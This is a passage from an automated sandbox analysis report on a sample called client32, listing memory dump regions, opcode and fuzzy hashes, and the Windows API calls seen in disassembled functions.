                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                    • Opcode ID: a53ce75d855dcbd486073db0eb06d7dfc2c285a5fb8413f02e9700c2a28670b3
                                                                                                                                                                                                    • Instruction ID: d8059401cb665801cb5abb2c0c8a905e6926a2865a99ab4fc771fff1d96c2e64
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a53ce75d855dcbd486073db0eb06d7dfc2c285a5fb8413f02e9700c2a28670b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7018E37615AF11AD60215B86A45B4EFB5C4F8173CF690165E8A4CB2C0EEEBD8D0C253
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,765A5530), ref: 11141457
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,023AB828,000000FF,?), ref: 11141545
                                                                                                                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,023AB828,000000FF,?), ref: 11141555
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2137077337-0
                                                                                                                                                                                                    • Opcode ID: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                                                                                                    • Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 111619FB
                                                                                                                                                                                                      • Part of subcall function 1116A682: GetCurrentProcess.KERNEL32(C0000417,110B7069,?,1119DD14), ref: 1116A698
                                                                                                                                                                                                      • Part of subcall function 1116A682: TerminateProcess.KERNEL32(00000000), ref: 1116A69F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentDecrementInterlockedTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3889136465-0
                                                                                                                                                                                                    • Opcode ID: 6cc01d460da6e9e8a6d9ac2a242b1bdfcbe20bfdd012fd6d770efdbb2dfa342e
                                                                                                                                                                                                    • Instruction ID: ecc366bbc7a0c1c23f87f8e5166af85a2a886dca55a83ee52fc5275e0f83c624
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cc01d460da6e9e8a6d9ac2a242b1bdfcbe20bfdd012fd6d770efdbb2dfa342e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB13B75A0061A9FDB65CF64C990BE9F7F9EF49304F1184AAE509E7240EB71AA90CF40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                    • Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76596610,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                                    • Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                                                                                    • Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                      • Part of subcall function 689D5E97: GetModuleFileNameW.KERNEL32(00000000,689FD8AA,00000104,00000001,00000000,689D6E81), ref: 689D5F33
                                                                                                                                                                                                      • Part of subcall function 689D5B34: ExitProcess.KERNEL32 ref: 689D5B45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1715456479-0
                                                                                                                                                                                                    • Opcode ID: 4b52e5b9babb192850fc18f173268e56c3ef4bc8fa25d7fd71eb406b265bffde
                                                                                                                                                                                                    • Instruction ID: 7899eee96e7a9f492e39278b2c4e105135519c84a96ebd27647bb3fd2500cc43
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b52e5b9babb192850fc18f173268e56c3ef4bc8fa25d7fd71eb406b265bffde
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B301963B248B02EAF2161B7AEC40B3A765CEBD3378F908035EA1596184EB69C440C66C
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                                                                    • Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                                                                                    • Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,689D6F16,00000000,?,689DD40B,00000001,689D6F16,00000000,00000000,00000000,?,689D6F16,00000001,00000214), ref: 689DA0C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: e02d8b8aba1edf324b968844284117670651138563c471c810779975d5a5fffe
                                                                                                                                                                                                    • Instruction ID: 057c492e804845e7543354a72628dae225a7a84197342cc88a34d97a73c30f6f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e02d8b8aba1edf324b968844284117670651138563c471c810779975d5a5fffe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1601B131309A12DEFB198E25DC14B6B37D8AB82368F40C529E827EB1C0DB75D420C688
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                                                                                    • Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 1108853A
                                                                                                                                                                                                      • Part of subcall function 1110CA30: GetCurrentThreadId.KERNEL32 ref: 1110CA5A
                                                                                                                                                                                                      • Part of subcall function 1110CA30: EnterCriticalSection.KERNEL32(00000000,?,1106FB37,?), ref: 1110CA69
                                                                                                                                                                                                      • Part of subcall function 1110CA30: LeaveCriticalSection.KERNEL32(00000000,?,00000000,?), ref: 1110CADC
                                                                                                                                                                                                      • Part of subcall function 11088380: GetCurrentThreadId.KERNEL32 ref: 110883A1
                                                                                                                                                                                                      • Part of subcall function 11088380: SetWindowsHookExA.USER32(00000002,Function_00087920,00000000,00000000), ref: 110883B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
